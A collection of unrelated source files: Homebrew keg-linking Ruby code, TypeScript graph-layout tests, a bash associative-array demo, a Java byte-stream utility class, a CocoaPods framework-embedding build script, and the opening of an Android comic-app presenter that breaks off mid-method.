    link_dir("include", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :link }

    link_dir("share", verbose: verbose, dry_run: dry_run, overwrite: overwrite) do |relative_path|
      case relative_path.to_s
      when INFOFILE_RX then :info
      when "locale/locale.alias",
           %r{^icons/.*/icon-theme\.cache$}
        :skip_file
      when LOCALEDIR_RX,
           %r{^icons/}, # all icons subfolders should also mkpath
           /^zsh/,
           /^fish/,
           %r{^lua/}, #  Lua, Lua51, Lua53 all need the same handling.
           %r{^guile/},
           *SHARE_PATHS
        :mkpath
      else
        :link
      end
    end

    link_dir("lib", verbose: verbose, dry_run: dry_run, overwrite: overwrite) do |relative_path|
      case relative_path.to_s
      when "charset.alias"
        :skip_file
      when "pkgconfig", # pkg-config database gets explicitly created
           "cmake", # cmake database gets explicitly created
           "dtrace", # lib/language folders also get explicitly created
           /^gdk-pixbuf/,
           "ghc",
           /^gio/,
           "lua",
           /^mecab/,
           /^node/,
           /^ocaml/,
           /^perl5/,
           "php",
           /^python[23]\.\d/,
           /^R/,
           /^ruby/
        :mkpath
      else
        # Everything else is symlinked to the cellar
        :link
      end
    end

    link_dir("Frameworks", verbose: verbose, dry_run: dry_run, overwrite: overwrite) do |relative_path|
      # Frameworks contain symlinks pointing into a subdir, so we have to use
      # the :link strategy. However, for Foo.framework and
      # Foo.framework/Versions we have to use :mkpath so that multiple formulae
      # can link their versions into it and `brew [un]link` works.
      if relative_path.to_s.match?(%r{[^/]*\.framework(/Versions)?$})
        :mkpath
      else
        :link
      end
    end

    unless dry_run
      make_relative_symlink(linked_keg_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
    end
  rescue LinkError
    unlink(verbose: verbose)
    raise
  else
    ObserverPathnameExtension.n
  end

  # Removes the old-name opt symlink if (and only if) it points at this keg.
  def remove_oldname_opt_record
    return unless oldname_opt_record
    return if oldname_opt_record.resolved_path != path

    @oldname_opt_record.unlink
    @oldname_opt_record.parent.rmdir_if_possible
    @oldname_opt_record = nil
  end

  def tab
    Tab.for_keg(self)
  end

  # Runtime dependencies as recorded in the tab, cached per keg path.
  def runtime_dependencies
    Keg.cache[:runtime_dependencies] ||= {}
    Keg.cache[:runtime_dependencies][path] ||= tab.runtime_dependencies
  end

  def aliases
    tab.aliases || []
  end

  # (Re)creates the opt symlinks for this keg: opt/<name>, one per alias,
  # and the old-name opt link if one exists.
  def optlink(verbose: false, dry_run: false, overwrite: false)
    opt_record.delete if opt_record.symlink? || opt_record.exist?
    make_relative_symlink(opt_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
    aliases.each do |a|
      alias_opt_record = opt_record.parent/a
      alias_opt_record.delete if alias_opt_record.symlink? || alias_opt_record.exist?
      make_relative_symlink(alias_opt_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
    end

    return unless oldname_opt_record

    oldname_opt_record.delete
    make_relative_symlink(oldname_opt_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
  end

  # Deletes compiled Python caches from the keg.
  def delete_pyc_files!
    find { |pn| pn.delete if PYC_EXTENSIONS.include?(pn.extname) }
    find { |pn| FileUtils.rm_rf pn if pn.basename.to_s == "__pycache__" }
  end

  private

  # If dst is a symlink into another keg's directory, unlinks it so both kegs
  # can share a real directory at that path. Returns true when a conflict was
  # resolved (the other keg re-links its dir as :mkpath).
  def resolve_any_conflicts(dst, dry_run: false, verbose: false, overwrite: false)
    return unless dst.symlink?

    src = dst.resolved_path

    # src itself may be a symlink, so check lstat to ensure we are dealing with
    # a directory, and not a symlink pointing at a directory (which needs to be
    # treated as a file). In other words, we only want to resolve one symlink.

    begin
      stat = src.lstat
    rescue Errno::ENOENT
      # dst is a broken symlink, so remove it.
      dst.unlink unless dry_run
      return
    end

    return unless stat.directory?

    begin
      keg = Keg.for(src)
    rescue NotAKegError
      puts "Won't resolve conflicts for symlink #{dst} as it doesn't resolve into the Cellar." if verbose
      return
    end

    dst.unlink unless dry_run
    keg.link_dir(src, dry_run: false, verbose: false, overwrite: false) { :mkpath }
    true
  end

  # Creates dst as a relative symlink to src, honouring dry_run/overwrite.
  # Translates low-level errors into ConflictError / DirectoryNotWritableError
  # / LinkError so callers get keg-aware diagnostics.
  def make_relative_symlink(dst, src, verbose: false, dry_run: false, overwrite: false)
    if dst.symlink? && src == dst.resolved_path
      puts "Skipping; link already exists: #{dst}" if verbose
      return
    end

    # cf. git-clean -n: list files to delete, don't really link or delete
    if dry_run && overwrite
      if dst.symlink?
        puts "#{dst} -> #{dst.resolved_path}"
      elsif dst.exist?
        puts dst
      end
      return
    end

    # list all link targets
    if dry_run
      puts dst
      return
    end

    dst.delete if overwrite && (dst.exist? || dst.symlink?)
    dst.make_relative_symlink(src)
  rescue Errno::EEXIST => e
    raise ConflictError.new(self, src.relative_path_from(path), dst, e) if dst.exist?

    if dst.symlink?
      # A dangling symlink is in the way: remove it and try again.
      dst.unlink
      retry
    end
  rescue Errno::EACCES => e
    raise DirectoryNotWritableError.new(self, src.relative_path_from(path), dst, e)
  rescue SystemCallError => e
    raise LinkError.new(self, src.relative_path_from(path), dst, e)
  end

  # Deletes alias_symlink when it points at (or is a leftover of) alias_match_path.
  def remove_alias_symlink(alias_symlink, alias_match_path)
    if alias_symlink.symlink? && alias_symlink.exist?
      alias_symlink.delete if alias_match_path.exist? && alias_symlink.realpath == alias_match_path.realpath
    elsif alias_symlink.symlink? || alias_symlink.exist?
      alias_symlink.delete
    end
  end

  protected

  # symlinks the contents of path+relative_dir recursively into #{HOMEBREW_PREFIX}/relative_dir
  # The block receives each entry's path relative to the dir and returns a
  # strategy symbol: :link, :mkpath, :info, :skip_file/:skip_dir (or nil).
  def link_dir(relative_dir, verbose: false, dry_run: false, overwrite: false)
    root = path/relative_dir
    return unless root.exist?

    root.find do |src|
      next if src == root

      dst = HOMEBREW_PREFIX + src.relative_path_from(path)
      dst.extend ObserverPathnameExtension

      if src.symlink? || src.file?
        Find.prune if File.basename(src) == ".DS_Store"
        Find.prune if src.resolved_path == dst
        # Don't link pyc or pyo files because Python overwrites these
        # cached object files and next time brew wants to link, the
        # file is in the way.
        Find.prune if PYC_EXTENSIONS.include?(src.extname) && src.to_s.include?("/site-packages/")

        case yield src.relative_path_from(root)
        when :skip_file, nil
          Find.prune
        when :info
          next if File.basename(src) == "dir" # skip historical local 'dir' files

          make_relative_symlink dst, src, verbose: verbose, dry_run: dry_run, overwrite: overwrite
          dst.install_info
        else
          make_relative_symlink dst, src, verbose: verbose, dry_run: dry_run, overwrite: overwrite
        end
      elsif src.directory?
        # if the dst dir already exists, then great! walk the rest of the tree tho
        next if dst.directory? && !dst.symlink?

        # no need to put .app bundles in the path, the user can just use
        # spotlight, or the open command and actual mac apps use an equivalent
        Find.prune if src.extname == ".app"

        case yield src.relative_path_from(root)
        when :skip_dir
          Find.prune
        when :mkpath
          dst.mkpath unless resolve_any_conflicts(dst, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
        else
          unless resolve_any_conflicts(dst, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
            make_relative_symlink dst, src, verbose: verbose, dry_run: dry_run, overwrite: overwrite
            Find.prune
          end
        end
      end
    end
  end
end
require "extend/os/keg"
|
<reponame>msaglJS/msagl-js
import {GeomGraph} from '../../../src'
import {GeomObject} from '../../../src/layout/core/geomObject'
import {SvgDebugWriter} from '../../utils/svgDebugWriter'
import {runMDSLayout, outputGraph} from '../../utils/testUtils'
import {sortedList} from '../sortedBySizeListOfgvFiles'
import {join} from 'path'
import {DrawingGraph} from '../../../drawing/drawingGraph'
// Smoke tests: run MDS layout over slices of the sorted graphviz corpus and
// dump the resulting geometry as SVG. Any exception from the layout engine
// fails the slice via expect(1).toBe(0).
// (Fix: catch parameters were named `Error`, shadowing the global Error
// constructor; renamed to `error`.)
test('graph with subgraphs', () => {
  const dg = runMDSLayout('test/data/graphvis/clust.gv')
  outputGraph(<GeomGraph>GeomObject.getGeom(dg.graph), 'clustMDS')
})

xtest('b7 pivot mds', () => {
  const dg = runMDSLayout('test/data/graphvis/b7.gv')
  outputGraph(<GeomGraph>GeomObject.getGeom(dg.graph), 'b7Mds.svg')
})

test('layout 0-50 gv files with MDS', () => {
  const path = 'test/data/graphvis/'
  let i = 0
  for (const f of sortedList) {
    if (f.match('big(.*).gv')) continue // the parser bug
    if (++i > 50) return
    let dg: DrawingGraph
    try {
      dg = runMDSLayout(join(path, f))
    } catch (error) {
      console.log('i = ' + i + ', ' + f + ' error:' + error.message)
      expect(1).toBe(0)
    }
    if (dg != null) {
      const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
      t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
    }
  }
})

test('layout 50-100 gv files with MDS', () => {
  const path = 'test/data/graphvis/'
  let i = 0
  for (const f of sortedList) {
    if (f.match('big(.*).gv')) continue // the parser bug
    if (++i > 100) return
    if (i < 50) continue
    let dg: DrawingGraph
    try {
      dg = runMDSLayout(join(path, f))
    } catch (error) {
      console.log(f + ' error:' + error.message)
      expect(1).toBe(0)
    }
    if (dg != null) {
      const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
      t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
    }
  }
})

xtest('layout 100-150 gv files with MDS', () => {
  const path = 'test/data/graphvis/'
  let i = 0
  for (const f of sortedList) {
    if (f.match('big(.*).gv')) continue // the parser bug
    if (++i > 150) return
    if (i < 100) continue
    let dg: DrawingGraph
    try {
      dg = runMDSLayout(join(path, f))
    } catch (error) {
      console.log(f + ' error:' + error.message)
      expect(1).toBe(0)
    }
    if (dg != null) {
      const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
      t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
    }
  }
})

xtest('layout 150-200 gv files with MDS', () => {
  const path = 'test/data/graphvis/'
  let i = 0
  for (const f of sortedList) {
    if (f.match('big(.*).gv')) continue // the parser bug
    if (++i > 200) return
    if (i < 150) continue
    let dg: DrawingGraph
    try {
      dg = runMDSLayout(join(path, f))
      if (dg != null) {
        const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
        t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
      }
    } catch (error) {
      console.log(f + ' error:' + error.message)
      expect(1).toBe(0)
    }
  }
})

xtest('layout 200-250 gv files with MDS', () => {
  const path = 'test/data/graphvis/'
  let i = 0
  for (const f of sortedList) {
    if (f.match('big(.*).gv')) continue // the parser bug
    if (++i > 250) return
    if (i < 200) continue
    let dg: DrawingGraph
    try {
      dg = runMDSLayout(join(path, f))
    } catch (error) {
      console.log(f + ' error:' + error.message)
      expect(1).toBe(0)
    }
    if (dg != null) {
      const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
      t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
    }
  }
})

test('layout from 250 and up gv files with MDS', () => {
  expect(3).toBe(3)
  // const path = 'test/data/graphvis/'
  // let i = 0
  // for (const f of sortedList) {
  //   if (f.match('big(.*).gv')) continue // the parser bug
  //   if (i++ < 250) continue
  //   let dg: DrawingGraph
  //   try {
  //     dg = runMDSLayout(join(path, f))
  //   } catch (error) {
  //     console.log(f + ' error:' + error.message)
  //     expect(1).toBe(0)
  //   }
  //   if (dg != null) {
  //     const t: SvgDebugWriter = new SvgDebugWriter('/tmp/' + f + '_pivot.svg')
  //     t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
  //   }
  // }
})
|
#!/usr/bin/env bash
# Demonstrates bash associative arrays: maps Linux Mint release names to
# their Ubuntu base release.
# For more information on arrays see:
# https://www.gnu.org/software/bash/manual/html_node/Arrays.html

MIN_VERSION=4

# ${BASH_VERSION%%.*} strips everything from the first '.' -> major version.
if (( ${BASH_VERSION%%.*} < MIN_VERSION )); then
  echo "This script needs bash >= $MIN_VERSION"
  exit 1
fi

# Note: this works on bash >= 4
# make 'distros' an associative array
declare -A distros

# Names of Linux Mint versions and its Ubuntu base
distros=(
  ['nadia']='quantal'
  ['olivia']='raring'
  ['petra']='saucy'
  ['qiana']='trusty'
  ['rebecca']='trusty'
)
# Individual entries can also be assigned after the fact.
distros["sarah"]="xenial"

distro='petra'
echo "Linux Mint name: '$distro'"
echo "Ubuntu base: '${distros[$distro]}'"
echo
echo "keys: ${!distros[@]}"
echo "values: ${distros[@]}"
echo

# Prints the Ubuntu base for the Mint release named in $1, or "unknown".
get_ubuntu_base() {
  # ${parameter:+alt_value} expands to alt_value iff parameter is set and
  # non-null -- used here as a "key exists" test.
  # For a reference on parameter substitution you can see:
  # http://tldp.org/LDP/abs/html/parameter-substitution.html
  # (Fix: expansions are now quoted -- ShellCheck SC2086 -- and the fragile
  # `A && B || C` chain is an explicit if/else -- SC2015.)
  if [ -n "${distros[$1]:+set}" ]; then
    echo "${distros[$1]}"
  else
    echo "unknown"
  fi
}

# Fix: use $(...) instead of deprecated backticks (ShellCheck SC2006).
echo "${distro}'s base is $(get_ubuntu_base "$distro")"
|
<reponame>smagill/opensphere-desktop<filename>open-sphere-plugins/open-sensor-hub/src/main/java/io/opensphere/osh/results/video/ByteUtilities.java
package io.opensphere.osh.results.video;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PushbackInputStream;
/** Byte utilities for copying streams and scanning them for byte markers. */
public final class ByteUtilities
{
    /** The buffer size used for all stream reads. */
    private static final int BUFFER_SIZE = 8192;

    /**
     * Reads a given number of bytes from the input stream to the output stream.
     * Stops early if the input stream reaches EOF.
     *
     * @param in the input stream
     * @param out the output stream
     * @param byteCount the number of bytes to read
     * @return the number of bytes read (may be less than byteCount on EOF)
     * @throws IOException if a problem occurs reading the stream
     */
    public static int readNBytes(InputStream in, OutputStream out, int byteCount) throws IOException
    {
        int totalBytesRead = 0;
        int bytesRead;
        byte[] bytes = new byte[BUFFER_SIZE];
        while (totalBytesRead < byteCount)
        {
            bytesRead = in.read(bytes, 0, Math.min(bytes.length, byteCount - totalBytesRead));
            if (bytesRead > 0)
            {
                out.write(bytes, 0, bytesRead);
                totalBytesRead += bytesRead;
            }
            else if (bytesRead == -1)
            {
                // EOF before byteCount bytes were available.
                break;
            }
        }
        return totalBytesRead;
    }

    /**
     * Reads the input stream into the output stream until the marker is found.
     * The marker is included in the output stream; any bytes read beyond the
     * marker are pushed back onto the stream. The stream must have a pushback
     * buffer of at least {@code marker.length} bytes.
     *
     * @param in the input stream
     * @param out the output stream
     * @param marker the marker to search for
     * @return whether EOF was hit
     * @throws IOException if a problem occurs reading the stream
     */
    public static boolean readUntilInclusive(PushbackInputStream in, OutputStream out, byte[] marker) throws IOException
    {
        int bytesRead;
        byte[] bytes = new byte[BUFFER_SIZE];
        // Tail (marker.length - 1 bytes) of the previous chunk, used to detect
        // markers that straddle a chunk boundary.
        // NOTE(review): this starts zero-filled, so a marker beginning with NUL
        // bytes could in principle false-match before the first chunk is read;
        // confirm markers never start with zero bytes.
        byte[] mostRecentBytes = new byte[marker.length - 1];
        while ((bytesRead = in.read(bytes)) != -1)
        {
            if (bytesRead > 0)
            {
                int index = indexOf(bytes, bytesRead, marker);
                if (index != -1)
                {
                    // Found the marker within this chunk: emit up to and
                    // including the marker, push back the remainder.
                    int writeLength = index + marker.length;
                    out.write(bytes, 0, writeLength);
                    in.unread(bytes, writeLength, bytesRead - writeLength);
                    break;
                }

                byte[] combinedBytes = concat(mostRecentBytes, bytes, Math.min(bytesRead, marker.length - 1));
                index = indexOf(combinedBytes, combinedBytes.length, marker);
                if (index != -1)
                {
                    // Found the marker across chunks: the leading part of the
                    // marker was already written with the previous chunk, so
                    // only the trailing (index + 1) bytes of this chunk belong
                    // to it. BUG FIX: push back the unconsumed remainder of
                    // this chunk -- it was previously dropped, losing data for
                    // any subsequent read.
                    int writeLength = index + 1;
                    out.write(bytes, 0, writeLength);
                    in.unread(bytes, writeLength, bytesRead - writeLength);
                    break;
                }

                out.write(bytes, 0, bytesRead);
                shift(mostRecentBytes, bytes, bytesRead);
            }
        }
        return bytesRead == -1;
    }

    /**
     * Returns the index of the marker in the given bytes, or -1 if it could not
     * be found.
     *
     * @param bytes the bytes to search through
     * @param byteLength the number of bytes to use from the byte array
     * @param marker the marker to search for
     * @return the index of the first occurrence of the marker, or -1
     */
    static int indexOf(byte[] bytes, int byteLength, byte[] marker)
    {
        // Only positions where the whole marker still fits need checking.
        int length = byteLength - (marker.length - 1);
        for (int b = 0; b < length; b++)
        {
            boolean equals = true;
            for (int m = 0; m < marker.length; m++)
            {
                if (bytes[b + m] != marker[m])
                {
                    equals = false;
                    break;
                }
            }
            if (equals)
            {
                return b;
            }
        }
        return -1;
    }

    /**
     * Shifts the new bytes into the bytes from the right, preserving the most
     * recently seen {@code bytes.length} bytes of the stream.
     *
     * @param bytes the bytes (sliding window, modified in place)
     * @param newBytes the new bytes
     * @param newByteLength the number of new bytes to shift in
     */
    static void shift(byte[] bytes, byte[] newBytes, int newByteLength)
    {
        if (newBytes.length >= bytes.length)
        {
            System.arraycopy(newBytes, newByteLength - bytes.length, bytes, 0, bytes.length);
        }
        else
        {
            System.arraycopy(bytes, newByteLength, bytes, 0, bytes.length - newByteLength);
            System.arraycopy(newBytes, 0, bytes, bytes.length - newByteLength, newByteLength);
        }
    }

    /**
     * Concatenates two byte arrays.
     *
     * @param b1 the first array
     * @param b2 the second array
     * @param b2Length the number of bytes from the second array to use
     * @return the concatenated array
     */
    static byte[] concat(byte[] b1, byte[] b2, int b2Length)
    {
        byte[] concat = new byte[b1.length + b2Length];
        System.arraycopy(b1, 0, concat, 0, b1.length);
        System.arraycopy(b2, 0, concat, b1.length, b2Length);
        return concat;
    }

    /** Disallow instantiation. */
    private ByteUtilities()
    {
    }
}
|
#!/bin/sh
# CocoaPods "Embed Pods Frameworks" build phase script (generated boilerplate):
# copies each vendored/built framework into the app bundle, strips
# architectures the current build does not target, and re-signs if required.
set -e
set -u
set -o pipefail

if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
  # If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
  # frameworks to, so exit 0 (signalling the script phase was successful).
  exit 0
fi

echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"

# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0

# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")

# Copies and strips a vendored framework
# $1: framework path (absolute, or relative to BUILT_PRODUCTS_DIR).
install_framework()
{
  if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$1"
  elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
  elif [ -r "$1" ]; then
    local source="$1"
  fi

  local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

  if [ -L "${source}" ]; then
    echo "Symlinked..."
    source="$(readlink "${source}")"
  fi

  # Use filter instead of exclude so missing patterns don't throw errors.
  echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
  rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"

  local basename
  basename="$(basename -s .framework "$1")"
  binary="${destination}/${basename}.framework/${basename}"

  # Fall back to a bare binary (non-.framework bundle layout).
  if ! [ -r "$binary" ]; then
    binary="${destination}/${basename}"
  fi

  # Strip invalid architectures so "fat" simulator / device frameworks work on device
  if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
    strip_invalid_archs "$binary"
  fi

  # Resign the code if required by the build settings to avoid unstable apps
  code_sign_if_enabled "${destination}/$(basename "$1")"

  # Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
  if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
    local swift_runtime_libs
    swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
    for lib in $swift_runtime_libs; do
      echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
      rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
      code_sign_if_enabled "${destination}/${lib}"
    done
  fi
}

# Copies and strips a vendored dSYM
# $1: path to the .framework.dSYM bundle.
install_dsym() {
  local source="$1"
  if [ -r "$source" ]; then
    # Copy the dSYM into a the targets temp dir.
    echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
    rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"

    local basename
    basename="$(basename -s .framework.dSYM "$source")"
    binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}"

    # Strip invalid architectures so "fat" simulator / device frameworks work on device
    if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then
      strip_invalid_archs "$binary"
    fi

    if [[ $STRIP_BINARY_RETVAL == 1 ]]; then
      # Move the stripped file into its final destination.
      echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
      rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
    else
      # The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
      touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM"
    fi
  fi
}

# Signs a framework with the provided identity
# $1: path of the bundle/binary to sign.
code_sign_if_enabled() {
  if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
    # Use the current code_sign_identitiy
    echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
    local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"

    # Background the signing job when parallel signing is enabled.
    if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
      code_sign_cmd="$code_sign_cmd &"
    fi
    echo "$code_sign_cmd"
    eval "$code_sign_cmd"
  fi
}

# Strip invalid architectures
# $1: binary to strip in place. Sets STRIP_BINARY_RETVAL (1 = stripped/ok,
# 0 = no matching architectures found).
strip_invalid_archs() {
  binary="$1"
  # Get architectures for current target binary
  binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
  # Intersect them with the architectures we are building for
  intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
  # If there are no archs supported by this binary then warn the user
  if [[ -z "$intersected_archs" ]]; then
    echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
    STRIP_BINARY_RETVAL=0
    return
  fi
  stripped=""
  for arch in $binary_archs; do
    if ! [[ "${ARCHS}" == *"$arch"* ]]; then
      # Strip non-valid architectures in-place
      lipo -remove "$arch" -output "$binary" "$binary" || exit 1
      stripped="$stripped $arch"
    fi
  done
  if [[ "$stripped" ]]; then
    echo "Stripped $binary of architectures:$stripped"
  fi
  STRIP_BINARY_RETVAL=1
}

# Embed every Pod framework for the active configuration.
if [[ "$CONFIGURATION" == "Debug" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/GoogleUtilities/GoogleUtilities.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/GzipSwift/Gzip.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/NVActivityIndicatorView/NVActivityIndicatorView.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/SCLAlertView/SCLAlertView.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/SwiftyJSON/SwiftyJSON.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/GoogleUtilities/GoogleUtilities.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/GzipSwift/Gzip.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/NVActivityIndicatorView/NVActivityIndicatorView.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/SCLAlertView/SCLAlertView.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/SwiftyJSON/SwiftyJSON.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
# Wait for any backgrounded parallel signing jobs before finishing the phase.
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
  wait
fi
package com.lai.mtc.mvp.presenter;
import com.lai.mtc.api.ComicApi;
import com.lai.mtc.bean.ComicListDetail;
import com.lai.mtc.comm.ApiException;
import com.lai.mtc.comm.HttpRxObserver;
import com.lai.mtc.mvp.base.impl.BasePresenter;
import com.lai.mtc.mvp.contract.ComicsListDetailContract;
import com.lai.mtc.mvp.utlis.ListUtils;
import com.lai.mtc.mvp.utlis.RxUtlis;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.concurrent.TimeUnit;
import javax.inject.Inject;
import io.reactivex.Observable;
import io.reactivex.ObservableEmitter;
import io.reactivex.ObservableOnSubscribe;
import io.reactivex.android.schedulers.AndroidSchedulers;
import io.reactivex.functions.Consumer;
import io.reactivex.functions.Function;
import io.reactivex.schedulers.Schedulers;
/**
 * Presenter bridging the comic-detail business logic to the view layer (MVP).
 *
 * @author Lai
 * @time 2017/12/11 17:04
 * @see BasePresenter
 */
public class ComicsListDetailPresenter extends BasePresenter<ComicsListDetailContract.View> implements ComicsListDetailContract.Model {

    /** API handle used to fetch comic data; released in {@link #onDestroy()}. */
    private ComicApi mComicApi;

    @Inject
    ComicsListDetailPresenter(ComicApi comicApi) {
        mComicApi = comicApi;
    }

    @Override
    public void onDestroy() {
        super.onDestroy();
        // Drop the API reference so this presenter does not retain it after the view is destroyed.
        mComicApi = null;
    }

    /**
     * Fetches the detail of a comic by its id and pushes the result to the view.
     * Shows the loading indicator first; on success delivers the detail and hides
     * loading, on failure forwards the {@link ApiException} to the view.
     *
     * @param id the comic id to look up
     */
    @Override
    public void getComicById(int id) {
        mRootView.showLoading();
        mComicApi.getComicById(id)
                // Move emissions to the main thread (per RxUtlis.toMain) and tie the
                // subscription to the view lifecycle so it is disposed automatically.
                .compose(RxUtlis.<ComicListDetail>toMain())
                .compose(mRootView.<ComicListDetail>bindToLifecycle())
                // Commented-out chapter-splitting step kept by the original author for
                // reference; the same split now lives in reverse() below.
                /* .doOnNext(new Consumer<ComicListDetail>() {
                    @Override
                    public void accept(ComicListDetail comicListDetail) {
                        if (comicListDetail != null && !ListUtils.isEmpty(comicListDetail.getChapters())) {
                            List<ComicListDetail.ChaptersBean> mirrors = comicListDetail.getChapters();
                            if (mirrors.size() > 52) {
                                comicListDetail.setShowChapters(new ArrayList<>(mirrors.subList(0, 52)));
                                comicListDetail.setLastChapters(new ArrayList<>(mirrors.subList(52, mirrors.size())));
                            }
                        }
                    }
                })*/
                // Convert HTTP failures into an error item (HttpResultFunction is presumably
                // a same-package helper — no import is visible here; verify).
                .onErrorResumeNext(new HttpResultFunction<ComicListDetail>())
                .observeOn(AndroidSchedulers.mainThread())
